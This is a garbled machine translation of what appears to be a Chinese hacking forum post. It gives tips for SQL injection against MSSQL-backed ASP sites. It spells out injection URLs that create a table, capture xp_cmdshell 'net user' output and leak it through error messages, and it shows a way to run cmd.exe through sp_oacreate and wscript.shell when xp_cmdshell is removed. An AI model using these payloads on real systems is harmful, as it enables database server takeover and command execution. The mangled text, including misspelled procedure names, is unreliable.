Author: Alpha from: http: //www.cnwill.com/ 1. display cmd execution was back in the injection is sa privileges, see echo when a very painful thing of less than command, Kotake brother nbsi in. There is also an attempt to go back, but why do you try it? Hehe, I said a way, absolutely seeing the echo, I don't know what method of Xiaozhu brother is to build a table statement: http://www.xxxxx .com / down / list.asp? id = 1; CREATE TABLE DIRS (Paths Varchar (1000)); - Back: Normal information! Explain that the construction form is successful! carry on! Statement: http://www.xxxxx.com/down/list.asp? Id = 1; INSERT DIRS EXEC MASTER.DBO.XP_CMDSHEC 'NET User'; - Return: Normal information. The DIRS data should be written: http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (Select Top 1 Paths from DIRS); - Back: Microsoft Ole DB Provider for SQL Server Error 80040E07 Converts VARCHAR Value '***' to a quotient error when the data type Int is int. ^ _ ^, So we see the result of returning, of course, directly using the contents of NBSI tombs will be faster. Similarly, other extensions can also be used to get content, such as regread, (no Test) 2. XP_dirtree write path problem NBSI's directory list tool is not very easy to use, sometimes it does not come out, it is actually out, you can see the data directly (default is nb_treelist_tmp). 3. Detecting the vulnerability of the vulnerability is not flattering. It is not easy to detect on the image digital character, but it is more necessary to filter the type of quotation marks, so it is recommended to detect, so that it is not a loss. : P) 4. Delete XPSQL70.DLL and XP_CMDSHELL, and the problem that is unable to upload is actually very early CZY Big Brother has already said, remember that lzy seems to say one, but this seems different Declare @s int exec sp_oacreate "wscript.shell", @ s out --exec sp_oamethod @s, "run", null, "cmd.exe / c: /a.txt" This is in the query analyzer Executed, directly in the address bar should also be executed, like this declare @s int; exec sp_oacreate "wscript.shell", @ s out; exec sp_oamethod @s, "run", null, "cmd.exe / c Echo aaa> c: /a.txt "Specific not in the injection point test
